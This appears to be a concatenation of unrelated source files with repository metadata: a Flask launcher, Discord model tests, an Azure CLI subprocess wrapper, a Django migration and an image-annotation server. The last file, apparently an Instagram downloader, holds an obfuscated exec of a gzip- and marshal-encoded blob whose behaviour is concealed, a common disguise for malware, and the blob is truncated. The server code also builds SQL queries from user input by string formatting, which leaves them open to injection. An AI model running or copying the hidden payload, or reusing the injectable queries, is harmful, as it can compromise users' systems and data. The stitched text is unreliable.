|
[
"MIT"
] | 4
|
2018-09-13T16:10:00.000Z
|
2018-09-25T15:00:47.000Z
|
wsgi.py
|
mzaglia/inpe_catalog
|
33d6d39df584923bcaf6f4d0dada8dbe4f08e147
|
[
"MIT"
] | 1
|
2018-07-26T17:18:35.000Z
|
2018-07-26T17:18:35.000Z
|
import os
from catalog import app
app.run(debug=True, host=os.environ.get('CATALOG_HOST'), port=os.environ.get('CATALOG_PORT'))
| 25.8
| 93
| 0.767442
| 22
| 129
| 4.409091
| 0.545455
| 0.185567
| 0.247423
| 0.391753
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.077519
| 129
| 4
| 94
| 32.25
| 0.815126
| 0
| 0
| 0
| 0
| 0
| 0.186047
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
526982b1c66fa86f7e157526cee329a014e8de74
| 3,741
|
py
|
Python
|
tests/test_models.py
|
Squidtoon99/dispike
|
db4b1a12268afcc87a96003923e6f56139872f0e
|
[
"MIT"
] | null | null | null |
tests/test_models.py
|
Squidtoon99/dispike
|
db4b1a12268afcc87a96003923e6f56139872f0e
|
[
"MIT"
] | null | null | null |
tests/test_models.py
|
Squidtoon99/dispike
|
db4b1a12268afcc87a96003923e6f56139872f0e
|
[
"MIT"
] | null | null | null |
from dispike.models import *
import pytest
def test_valid_incoming_one_option():
data = {
"channel_id": "123123",
"data": {
"id": "12312312",
"name": "sendmessage",
"options": [{"name": "message", "value": "test"}],
},
"guild_id": "123123",
"id": "123123123132",
"member": {
"deaf": False,
"is_pending": False,
"joined_at": "2019-05-12T18:36:16.878000+00:00",
"mute": False,
"nick": None,
"pending": False,
"permissions": "2147483647",
"premium_since": None,
"roles": [
"123123",
"123123",
"1231233",
"1231233133",
"12412412414",
],
"user": {
"avatar": "b723979992a56",
"discriminator": "3333",
"id": "234234213122123",
"public_flags": 768,
"username": "exo",
},
},
"token": "Null",
"type": 2,
"version": 1,
}
_create_model = IncomingDiscordInteraction(**data)
assert len(_create_model.data.options) == 1
def test_valid_incoming_multiple_options():
data = {
"channel_id": "123123",
"data": {
"id": "12312312",
"name": "sendmessage",
"options": [
{"name": "message", "value": "test"},
{"name": "message2", "value": "test2"},
],
},
"guild_id": "123123",
"id": "123123123132",
"member": {
"deaf": False,
"is_pending": False,
"joined_at": "2019-05-12T18:36:16.878000+00:00",
"mute": False,
"nick": None,
"pending": False,
"permissions": "2147483647",
"premium_since": None,
"roles": [
"123123",
"123123",
"1231233",
"1231233133",
"12412412414",
],
"user": {
"avatar": "b723979992a56",
"discriminator": "3333",
"id": "234234213122123",
"public_flags": 768,
"username": "exo",
},
},
"token": "Null",
"type": 2,
"version": 1,
}
_create_model = IncomingDiscordInteraction(**data)
assert len(_create_model.data.options) == 2
def test_valid_interaction_name():
data = {
"channel_id": "123123",
"data": {
"id": "12312312",
"name": "sendmessage",
"options": [{"name": "message", "value": "test"}],
},
"guild_id": "123123",
"id": "123123123132",
"member": {
"deaf": False,
"is_pending": False,
"joined_at": "2019-05-12T18:36:16.878000+00:00",
"mute": False,
"nick": None,
"pending": False,
"permissions": "2147483647",
"premium_since": None,
"roles": [
"123123",
"123123",
"1231233",
"1231233133",
"12412412414",
],
"user": {
"avatar": "b723979992a56",
"discriminator": "3333",
"id": "234234213122123",
"public_flags": 768,
"username": "exo",
},
},
"token": "Null",
"type": 2,
"version": 1,
}
_created_object = IncomingDiscordInteraction(**data)
assert _created_object.data.name == "sendmessage"
| 28.340909
| 62
| 0.41513
| 269
| 3,741
| 5.620818
| 0.282528
| 0.031746
| 0.02381
| 0.037698
| 0.847222
| 0.847222
| 0.847222
| 0.847222
| 0.847222
| 0.847222
| 0
| 0.199533
| 0.42796
| 3,741
| 131
| 63
| 28.557252
| 0.507009
| 0
| 0
| 0.808
| 0
| 0
| 0.293504
| 0.025662
| 0
| 0
| 0
| 0
| 0.024
| 1
| 0.024
| false
| 0
| 0.016
| 0
| 0.04
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5278f00de44639f802a1c375c893306cf8471e47
| 2,363
|
py
|
Python
|
test/pyaz/resource/link/__init__.py
|
bigdatamoore/py-az-cli
|
54383a4ee7cc77556f6183e74e992eec95b28e01
|
[
"MIT"
] | null | null | null |
test/pyaz/resource/link/__init__.py
|
bigdatamoore/py-az-cli
|
54383a4ee7cc77556f6183e74e992eec95b28e01
|
[
"MIT"
] | 9
|
2021-09-24T16:37:24.000Z
|
2021-12-24T00:39:19.000Z
|
test/pyaz/resource/link/__init__.py
|
bigdatamoore/py-az-cli
|
54383a4ee7cc77556f6183e74e992eec95b28e01
|
[
"MIT"
] | null | null | null |
import json, subprocess
from ... pyaz_utils import get_cli_name, get_params
def create(link, target, notes=None):
params = get_params(locals())
command = "az resource link create " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
def delete(link):
params = get_params(locals())
command = "az resource link delete " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
def show(link):
params = get_params(locals())
command = "az resource link show " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
def list(scope=None, filter=None):
params = get_params(locals())
command = "az resource link list " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
def update(link, target=None, notes=None):
params = get_params(locals())
command = "az resource link update " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
| 31.932432
| 96
| 0.648752
| 287
| 2,363
| 5.310105
| 0.149826
| 0.091864
| 0.065617
| 0.068898
| 0.900262
| 0.900262
| 0.900262
| 0.900262
| 0.900262
| 0.809711
| 0
| 0.005516
| 0.232755
| 2,363
| 73
| 97
| 32.369863
| 0.83508
| 0
| 0
| 0.820896
| 0
| 0
| 0.07025
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.074627
| false
| 0
| 0.029851
| 0
| 0.179104
| 0.223881
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
528c5ddaa1d8deb4de4e818522c557a73259fb79
| 226
|
py
|
Python
|
ml_privacy_meter/utils/__init__.py
|
mihirkhandekar/ml_privacy_meter
|
c8efa4b444a7908783cf83acc2a0270113dc2356
|
[
"MIT"
] | null | null | null |
ml_privacy_meter/utils/__init__.py
|
mihirkhandekar/ml_privacy_meter
|
c8efa4b444a7908783cf83acc2a0270113dc2356
|
[
"MIT"
] | null | null | null |
ml_privacy_meter/utils/__init__.py
|
mihirkhandekar/ml_privacy_meter
|
c8efa4b444a7908783cf83acc2a0270113dc2356
|
[
"MIT"
] | null | null | null |
from ml_privacy_meter.utils import optimizers
from ml_privacy_meter.utils import losses
from ml_privacy_meter.utils import logger
from ml_privacy_meter.utils import attack_data
from ml_privacy_meter.utils import attack_utils
| 32.285714
| 47
| 0.884956
| 37
| 226
| 5.081081
| 0.297297
| 0.159574
| 0.345745
| 0.478723
| 0.835106
| 0.835106
| 0.37234
| 0
| 0
| 0
| 0
| 0
| 0.09292
| 226
| 7
| 47
| 32.285714
| 0.917073
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
875fdb1866c2bb0bd365f526d91476c464170c00
| 6,203
|
py
|
Python
|
cfgov/v1/migrations/0144_rm_hero_links.py
|
higs4281/cfgov-refresh
|
a02b193fb2373d443265c21845adf8a196e05675
|
[
"CC0-1.0"
] | 1
|
2019-11-26T20:18:22.000Z
|
2019-11-26T20:18:22.000Z
|
cfgov/v1/migrations/0144_rm_hero_links.py
|
higs4281/cfgov-refresh
|
a02b193fb2373d443265c21845adf8a196e05675
|
[
"CC0-1.0"
] | 8
|
2021-03-11T00:55:51.000Z
|
2022-02-13T21:10:14.000Z
|
cfgov/v1/migrations/0144_rm_hero_links.py
|
higs4281/cfgov-refresh
|
a02b193fb2373d443265c21845adf8a196e05675
|
[
"CC0-1.0"
] | 1
|
2019-12-28T14:04:07.000Z
|
2019-12-28T14:04:07.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.20 on 2019-03-05 18:45
from __future__ import unicode_literals
from django.db import migrations
import wagtail.wagtailcore.blocks
import wagtail.wagtailcore.fields
import wagtail.wagtailimages.blocks
class Migration(migrations.Migration):
dependencies = [
('v1', '0143_rm_formfieldwithbutton'),
]
operations = [
migrations.AlterField(
model_name='landingpage',
name='header',
field=wagtail.wagtailcore.fields.StreamField([(b'hero', wagtail.wagtailcore.blocks.StructBlock([(b'heading', wagtail.wagtailcore.blocks.CharBlock(help_text=b'Maximum character count: 25 (including spaces)', required=False)), (b'body', wagtail.wagtailcore.blocks.RichTextBlock(help_text=b'Maximum character count: 185 (including spaces)', required=False)), (b'background_color', wagtail.wagtailcore.blocks.CharBlock(help_text=b'Specify a hex value (with the # sign) from our official palette: https://github.com/cfpb/cf-theme-cfpb/blob/master/src/color-palette.less', required=False)), (b'is_white_text', wagtail.wagtailcore.blocks.BooleanBlock(help_text=b'Turns the hero text white. Useful if using a dark background color or background image.', required=False)), (b'image', wagtail.wagtailimages.blocks.ImageChooserBlock(help_text=b'Should be exactly 390px tall, and up to 940px wide, unless this is an overlay or bleeding style hero.', required=False)), (b'is_overlay', wagtail.wagtailcore.blocks.BooleanBlock(help_text=b'Select if you want the provided image to be a background image under the entire hero.', required=False)), (b'is_bleeding', wagtail.wagtailcore.blocks.BooleanBlock(help_text=b'Select if you want the provided image to bleed vertically off the top and bottom of the hero.', required=False)), (b'small_image', wagtail.wagtailimages.blocks.ImageChooserBlock(help_text=b'Provide an alternate image for small displays when using a bleeding or overlay hero.', required=False))])), (b'text_introduction', wagtail.wagtailcore.blocks.StructBlock([(b'eyebrow', wagtail.wagtailcore.blocks.CharBlock(help_text=b'Optional: Adds an H5 eyebrow above H1 heading text. Only use in conjunction with heading.', label=b'Pre-heading', required=False)), (b'heading', wagtail.wagtailcore.blocks.CharBlock(required=False)), (b'intro', wagtail.wagtailcore.blocks.RichTextBlock(required=False)), (b'body', wagtail.wagtailcore.blocks.RichTextBlock(required=False)), (b'links', wagtail.wagtailcore.blocks.ListBlock(wagtail.wagtailcore.blocks.StructBlock([(b'text', wagtail.wagtailcore.blocks.CharBlock(required=False)), (b'url', wagtail.wagtailcore.blocks.CharBlock(default=b'/', required=False))]), required=False)), (b'has_rule', wagtail.wagtailcore.blocks.BooleanBlock(help_text=b'Check this to add a horizontal rule line to bottom of text introduction.', label=b'Has bottom rule', required=False))]))], blank=True),
),
migrations.AlterField(
model_name='sublandingfilterablepage',
name='header',
field=wagtail.wagtailcore.fields.StreamField([(b'hero', wagtail.wagtailcore.blocks.StructBlock([(b'heading', wagtail.wagtailcore.blocks.CharBlock(help_text=b'Maximum character count: 25 (including spaces)', required=False)), (b'body', wagtail.wagtailcore.blocks.RichTextBlock(help_text=b'Maximum character count: 185 (including spaces)', required=False)), (b'background_color', wagtail.wagtailcore.blocks.CharBlock(help_text=b'Specify a hex value (with the # sign) from our official palette: https://github.com/cfpb/cf-theme-cfpb/blob/master/src/color-palette.less', required=False)), (b'is_white_text', wagtail.wagtailcore.blocks.BooleanBlock(help_text=b'Turns the hero text white. Useful if using a dark background color or background image.', required=False)), (b'image', wagtail.wagtailimages.blocks.ImageChooserBlock(help_text=b'Should be exactly 390px tall, and up to 940px wide, unless this is an overlay or bleeding style hero.', required=False)), (b'is_overlay', wagtail.wagtailcore.blocks.BooleanBlock(help_text=b'Select if you want the provided image to be a background image under the entire hero.', required=False)), (b'is_bleeding', wagtail.wagtailcore.blocks.BooleanBlock(help_text=b'Select if you want the provided image to bleed vertically off the top and bottom of the hero.', required=False)), (b'small_image', wagtail.wagtailimages.blocks.ImageChooserBlock(help_text=b'Provide an alternate image for small displays when using a bleeding or overlay hero.', required=False))]))], blank=True),
),
migrations.AlterField(
model_name='sublandingpage',
name='header',
field=wagtail.wagtailcore.fields.StreamField([(b'hero', wagtail.wagtailcore.blocks.StructBlock([(b'heading', wagtail.wagtailcore.blocks.CharBlock(help_text=b'Maximum character count: 25 (including spaces)', required=False)), (b'body', wagtail.wagtailcore.blocks.RichTextBlock(help_text=b'Maximum character count: 185 (including spaces)', required=False)), (b'background_color', wagtail.wagtailcore.blocks.CharBlock(help_text=b'Specify a hex value (with the # sign) from our official palette: https://github.com/cfpb/cf-theme-cfpb/blob/master/src/color-palette.less', required=False)), (b'is_white_text', wagtail.wagtailcore.blocks.BooleanBlock(help_text=b'Turns the hero text white. Useful if using a dark background color or background image.', required=False)), (b'image', wagtail.wagtailimages.blocks.ImageChooserBlock(help_text=b'Should be exactly 390px tall, and up to 940px wide, unless this is an overlay or bleeding style hero.', required=False)), (b'is_overlay', wagtail.wagtailcore.blocks.BooleanBlock(help_text=b'Select if you want the provided image to be a background image under the entire hero.', required=False)), (b'is_bleeding', wagtail.wagtailcore.blocks.BooleanBlock(help_text=b'Select if you want the provided image to bleed vertically off the top and bottom of the hero.', required=False)), (b'small_image', wagtail.wagtailimages.blocks.ImageChooserBlock(help_text=b'Provide an alternate image for small displays when using a bleeding or overlay hero.', required=False))]))], blank=True),
),
]
| 182.441176
| 2,425
| 0.770434
| 864
| 6,203
| 5.466435
| 0.179398
| 0.137201
| 0.162609
| 0.069871
| 0.854965
| 0.839721
| 0.838027
| 0.788905
| 0.760322
| 0.760322
| 0
| 0.010466
| 0.106561
| 6,203
| 33
| 2,426
| 187.969697
| 0.841754
| 0.011124
| 0
| 0.423077
| 1
| 0.230769
| 0.428478
| 0.008318
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.192308
| 0
| 0.307692
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
5e415d220d92e02d210bb32ac6bb18286e09279f
| 14,975
|
py
|
Python
|
system-server/function.py
|
xingximing-xxm/Image-Annotation-Correction-System
|
aeb5d3c556d30c855b8dfea61feeaf17d46ec135
|
[
"MIT"
] | null | null | null |
system-server/function.py
|
xingximing-xxm/Image-Annotation-Correction-System
|
aeb5d3c556d30c855b8dfea61feeaf17d46ec135
|
[
"MIT"
] | null | null | null |
system-server/function.py
|
xingximing-xxm/Image-Annotation-Correction-System
|
aeb5d3c556d30c855b8dfea61feeaf17d46ec135
|
[
"MIT"
] | null | null | null |
from nltk.corpus import wordnet
import torch
from tqdm import tqdm
from labeldic import label_dic
import json
from datetime import datetime
from multiprocessing import Lock
def login(cursor, data):
user = data['inf']
lock = Lock()
lock.acquire()
cursor.execute("select * from Users where username='%s' and password='%s';" % (user['username'], user['password']))
result = cursor.fetchall()
history = result[0][2]
lock.release()
if len(result) == 1:
admin = result[0][3]
lock.acquire()
cursor.execute("select upload, retrieve from Admin where admin = %d;" % admin)
result = cursor.fetchall()
admin = {'upload': result[0][0], 'retrieve': result[0][1]}
lock.release()
if data['dataset'] == 'ImageNet':
all_classes = [label_dic[str(i)][0] for i in range(1000)]
else:
lock.acquire()
cursor.execute("select label from %s_Label order by id asc;" % data['dataset'])
all_classes = [item[0] for item in cursor.fetchall()]
lock.release()
lock.acquire()
cursor.execute("select name, classes, number, is_c from Dataset;")
datasets = []
dataSource = []
for item in cursor.fetchall():
if item[3] == 1:
datasets.append(item[0])
dataSource.append({'dataset': item[0], 'classes': item[1], 'number': item[2], 'is_c': item[3]})
lock.release()
print(dataSource)
return True, "Log in successful.", history, all_classes, {'datasets': datasets, 'dataSource': dataSource}, admin
else:
return False, "Username or password error.", {"history": []}
def register(cursor, data):
cursor.execute("select * from Users where username='%s';" % (data['username']))
result = cursor.fetchall()
if len(result) > 0:
return False, "The username has been registered."
else:
cursor.execute(
"insert into Users (username, password, history, admin) values('%s', '%s', '%s', 0);" % (
data['username'], data['password'], json.dumps({"history": []})))
return True, "Registration successful."
def size(flag, item):
if flag == 'all':
return True
elif flag == 'large':
if item[4] >= 1000:
return True
else:
return False
elif flag == 'middle':
if 800 <= item[4] < 1000:
return True
else:
return False
else:
if item[4] < 800:
return True
else:
return False
def date(flag, item):
if flag == 'all':
return True
elif flag == 'one':
if (datetime.now() - item[5]).days < 1:
return True
else:
return False
elif flag == 'three':
if (datetime.now() - item[5]).days < 3:
return True
else:
return False
else:
if (datetime.now() - item[5]).days < 7:
return True
else:
return False
def noisy(cursor, data):
if data['dataset'] == 'ImageNet':
noisy_images = []
cursor.execute(
"select path, noisy_label, clean_label, score, size, time from %s where noisy_label <> clean_label order by score asc;" %
data['dataset'])
result = cursor.fetchall()
for item in result:
if size(data['size'], item) and date(data['date'], item):
image = {'path': '/imgs' + item[0], 'noisy_label': label_dic[str(item[1])][0],
'clean_label': label_dic[str(item[2])][0], 'size': item[4]}
noisy_images.append(image)
noisy_num = len(noisy_images)
cursor.execute("select count(*) from %s where noisy_label = clean_label;" % data['dataset'])
result = cursor.fetchall()
clean_num = result[0][0]
else:
noisy_images = []
cursor.execute("select label from %s_Label order by id asc;" % data['dataset'])
all_classes = [item[0] for item in cursor.fetchall()]
cursor.execute(
"select path, noisy_label, clean_label, score, size, time from %s where noisy_label <> clean_label order by score asc;" % data['dataset'])
result = cursor.fetchall()
for item in result:
if size(data['size'], item) and date(data['date'], item):
image = {'path': '/imgs' + item[0], 'noisy_label': all_classes[item[1]],
'clean_label': all_classes[item[2]], 'size': item[4]}
noisy_images.append(image)
noisy_num = len(noisy_images)
cursor.execute("select count(*) from %s where noisy_label = clean_label;" % data['dataset'])
result = cursor.fetchall()
clean_num = result[0][0]
return noisy_images, clean_num, noisy_num
def search_generic(cursor, data):
if data['dataset'] == 'ImageNet':
label_imagenet = torch.load('label/imagenet_label.dic')
word_list = []
for i in tqdm(range(len(label_imagenet))):
word = {}
for item in label_imagenet[i]:
try:
word[item] = wordnet.synsets(item)[0]
except:
continue
word_list.append(word)
clean_images, noisy_images = [], []
try:
word_search = data['search'].split(' ')
for i in range(len(word_search)):
word_search[i] = wordnet.synsets(word_search[i])[0]
except:
return clean_images, noisy_images, 0, 0
c = []
for i in tqdm(range(len(label_imagenet))):
s_all = 0
s_len = len(label_imagenet[i])
for item in label_imagenet[i]:
try:
word = word_list[i][item]
similarity = 0
for j in range(len(word_search)):
similarity += word_search[j].path_similarity(word)
similarity = similarity / len(word_search)
s_all += similarity
except:
s_len -= 1
continue
try:
s_equal = s_all / s_len
if s_equal > 0.4:
c.append(i)
except:
continue
if len(c) == 0:
return clean_images, noisy_images, 0, 0
else:
result = []
for item in c:
cursor.execute(
"select path, noisy_label, clean_label, score, size, time from %s where noisy_label=%d and noisy_label = clean_label;" % (
data['dataset'], item))
result += cursor.fetchall()
result = sorted(result, key=lambda tup: tup[3], reverse=True)
for item in result:
if size(data['size'], item) and date(data['date'], item):
image = {'path': '/imgs' + item[0], 'label': label_dic[str(item[1])][0], 'size': item[4]}
clean_images.append(image)
clean_num = len(clean_images)
result = []
for item in c:
cursor.execute(
"select path, noisy_label, clean_label, score, size, time from %s where noisy_label=%d and noisy_label <> clean_label;" % (
data['dataset'],
item))
result += cursor.fetchall()
result = sorted(result, key=lambda tup: tup[3])
for item in result:
if size(data['size'], item) and date(data['date'], item):
image = {'path': '/imgs' + item[0], 'noisy_label': label_dic[str(item[1])][0],
'clean_label': label_dic[str(item[2])][0], 'size': item[4]}
noisy_images.append(image)
noisy_num = len(noisy_images)
for item in c:
print(label_dic[str(item)][0])
else:
cursor.execute("select label from %s_Label order by id asc;" % data['dataset'])
all_classes = [item[0] for item in cursor.fetchall()]
all_classes = [item.split(' ') for item in all_classes]
word_list = []
for i in tqdm(range(len(all_classes))):
word = {}
for item in all_classes[i]:
try:
word[item] = wordnet.synsets(item)[0]
except:
continue
word_list.append(word)
clean_images, noisy_images = [], []
try:
word_search = data['search'].split(' ')
for i in range(len(word_search)):
word_search[i] = wordnet.synsets(word_search[i])[0]
except:
return clean_images, noisy_images, 0, 0
c = []
for i in tqdm(range(len(all_classes))):
s_all = 0
s_len = len(all_classes[i])
for item in all_classes[i]:
try:
word = word_list[i][item]
similarity = 0
for j in range(len(word_search)):
similarity += word_search[j].path_similarity(word)
similarity = similarity / len(word_search)
s_all += similarity
except:
s_len -= 1
continue
try:
s_equal = s_all / s_len
if s_equal > 0.4:
c.append(i)
except:
continue
if len(c) == 0:
return clean_images, noisy_images, 0, 0
else:
result = []
for item in c:
cursor.execute(
"select path, noisy_label, clean_label, score, size, time from %s where noisy_label=%d and noisy_label = clean_label;" % (
data['dataset'], item))
result += cursor.fetchall()
result = sorted(result, key=lambda tup: tup[3], reverse=True)
for item in result:
if size(data['size'], item) and date(data['date'], item):
image = {'path': '/imgs' + item[0], 'label': all_classes[item[1]], 'size': item[4]}
clean_images.append(image)
clean_num = len(clean_images)
result = []
for item in c:
cursor.execute(
"select path, noisy_label, clean_label, score, size, time from %s where noisy_label=%d and noisy_label <> clean_label;" % (
data['dataset'],
item))
result += cursor.fetchall()
result = sorted(result, key=lambda tup: tup[3])
for item in result:
if size(data['size'], item) and date(data['date'], item):
image = {'path': '/imgs' + item[0], 'noisy_label': all_classes[item[1]],
'clean_label': all_classes[item[2]], 'size': item[4]}
noisy_images.append(image)
noisy_num = len(noisy_images)
for item in c:
print(label_dic[str(item)][0])
return clean_images, noisy_images, clean_num, noisy_num
def search_accurate(cursor, data):
clean_images, noisy_images = [], []
search = data['search']
if data['dataset'] == 'ImageNet':
c = -1
for i in tqdm(range(len(label_dic))):
if search in label_dic[str(i)]:
c = i
break
if c == -1:
return clean_images, noisy_images, 0, 0
else:
cursor.execute(
"select path, noisy_label, clean_label, score, size, time from %s where noisy_label=%d and noisy_label = clean_label order by score desc;" % (
data['dataset'],
c))
result = cursor.fetchall()
for item in result:
if size(data['size'], item) and date(data['date'], item):
image = {'path': '/imgs' + item[0], 'label': label_dic[str(item[1])][0], 'size': item[4]}
clean_images.append(image)
clean_num = len(clean_images)
cursor.execute(
"select path, noisy_label, clean_label, score, size, time from %s where noisy_label=%d and noisy_label <> clean_label order by score asc;" % (
data['dataset'],
c))
result = cursor.fetchall()
for item in result:
if size(data['size'], item) and date(data['date'], item):
image = {'path': '/imgs' + item[0], 'noisy_label': label_dic[str(item[1])][0],
'clean_label': label_dic[str(item[2])][0], 'size': item[4]}
noisy_images.append(image)
noisy_num = len(noisy_images)
print(c)
else:
cursor.execute("select label from %s_Label order by id asc;" % data['dataset'])
all_classes = [item[0] for item in cursor.fetchall()]
c = -1
for i in tqdm(range(len(all_classes))):
if search == all_classes[i]:
c = i
break
if c == -1:
return clean_images, noisy_images, 0, 0
else:
cursor.execute(
"select path, noisy_label, clean_label, score, size, time from %s where noisy_label=%d and noisy_label = clean_label order by score desc;" % (
data['dataset'],
c))
result = cursor.fetchall()
for item in result:
if size(data['size'], item) and date(data['date'], item):
image = {'path': '/imgs' + item[0], 'label': all_classes[item[1]], 'size': item[4]}
clean_images.append(image)
clean_num = len(clean_images)
cursor.execute(
"select path, noisy_label, clean_label, score, size, time from %s where noisy_label=%d and noisy_label <> clean_label order by score asc;" % (
data['dataset'],
c))
result = cursor.fetchall()
for item in result:
if size(data['size'], item) and date(data['date'], item):
image = {'path': '/imgs' + item[0], 'noisy_label': all_classes[item[1]],
'clean_label': all_classes[item[2]], 'size': item[4]}
noisy_images.append(image)
noisy_num = len(noisy_images)
return clean_images, noisy_images, clean_num, noisy_num
| 41.14011
| 159
| 0.499366
| 1,700
| 14,975
| 4.271176
| 0.075882
| 0.04958
| 0.032227
| 0.060598
| 0.82165
| 0.802369
| 0.773998
| 0.762567
| 0.70376
| 0.682
| 0
| 0.014608
| 0.378297
| 14,975
| 363
| 160
| 41.253444
| 0.765306
| 0
| 0
| 0.813253
| 0
| 0.033133
| 0.179852
| 0.001642
| 0
| 0
| 0
| 0
| 0
| 1
| 0.021084
| false
| 0.012048
| 0.021084
| 0
| 0.123494
| 0.012048
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5e84b862ff29eb4b12747dab6596bf3ae10465f9
| 173,695
|
py
|
Python
|
bin/temp/var/usd/cd/tmp/usd/data/data/data/data/data/temp/insta.py
|
RazorKenway/All-Downloader
|
e1c6d9ee277166faff8876e967b521fd752f0e7f
|
[
"MIT"
] | 44
|
2021-06-28T15:57:18.000Z
|
2022-03-22T07:36:13.000Z
|
bin/temp/var/usd/cd/tmp/usd/data/data/data/data/data/temp/insta.py
|
RazorKenway/All-Downloader
|
e1c6d9ee277166faff8876e967b521fd752f0e7f
|
[
"MIT"
] | 1
|
2021-11-26T13:28:10.000Z
|
2022-01-10T21:23:41.000Z
|
bin/temp/var/usd/cd/tmp/usd/data/data/data/data/data/temp/insta.py
|
RazorKenway/All-Downloader
|
e1c6d9ee277166faff8876e967b521fd752f0e7f
|
[
"MIT"
] | 5
|
2021-08-23T17:34:56.000Z
|
2022-02-25T19:23:59.000Z
|
#ENCODE BY CRYPTO
#YOU CAN TRY THIS DECODE GOD BLESS
import gzip,marshal,zlib,base64,binascii,lzma
try:
exec(gzip.decompress(marshal.loads(b's\xc4\xeb\x00\x00\x1f\x8b\x08\x00\x00\x86\x98a\x02\xff\\]YC\x14M\x90|\xdf_\x81\x88\xa8\xa0\xd0\xf7\xa1"\xa0 \xa2\x82\x8a"\xa8\xa8tuu\x0b\xa2\xdc\xca!\xfa\xdbw"2\xca\xf9v\x1f<\x80a\xa6\xbb\xba*\x8f\xc8\xc8\xc8\xdd\x1f\x87\x07\xc7\xa7#\xae9\xe9\x8a\xec\xce\x8f\xe6\xf8d\xa7\xf9~\xc7\xed\xee7\'\xed\xee\xee\x9d\xaf\x97\xbb\x87w.\xbf\xef\xba\xff9=\xbe\xb8\xd7\x9dw\xed-\xbdf\xea\xfbA\xe3On\xe1\x05S\xbek\x0f~\x1c\x1ew\'\'\xb7\xdc\xcd\xad\xf3\xb8\xdf:\xaf\xdc\xd6yT\r\xfeD\xf6\xa7*\xb6\xce\xeb\xaa\x19|\x91l\x9d\xf7\x83\x17\xb4\xed\xd6\xb9+\xb7\xce}z25\xf8n7\xf8\n/\xcd\x06\xbf>\xf85?\xf8uW\xfc\xd8:\xef\x06\xffi\x07\xdfl\x07\xbf_\xd5\x83\xaf\xfd\xe0Of\xdf\xeb\xf1!\xff^\xf9\xff\xfe3\xf8\xb8\xc1K\xfb\xc1\x1f\xef\x7f\x7f\xb1\xef\xf4\xc5\xf4\xe0\xcb\xc1\xdb7\x83w\xaa\x07\x17\xd3u\xe1\xff\x7f\x07_\x0c~P\x97\xf6\x8d\xae\x89u\xa9\x8d]n\x9c\xd9%\x97\xfd]|\xf0\x97\xfb\x97\x83\x7f\x06_G%\xaem\xce.\xb0\x1d\xdc\x81/\xe6>\xe8\x0e\xf1\xa3\xe8\x83}\x9b\xdfp#\x1fF\xc2\x7f\x07\x9f\x83\x9f5\xff~\xb6\xfda{\xf01\x83\x0b\xea\xa3\xf1\xc1\x05\xe0\xaf6\xba\x18|\x0b\xffk\xf0\xbf:\xc2\xc7\xe0\x1dj\xbd\xa9\xfe\xadb\xfb\xb7\x8d\xe6p\xe9x\xc7\xc1:\xd4\xf9\xf0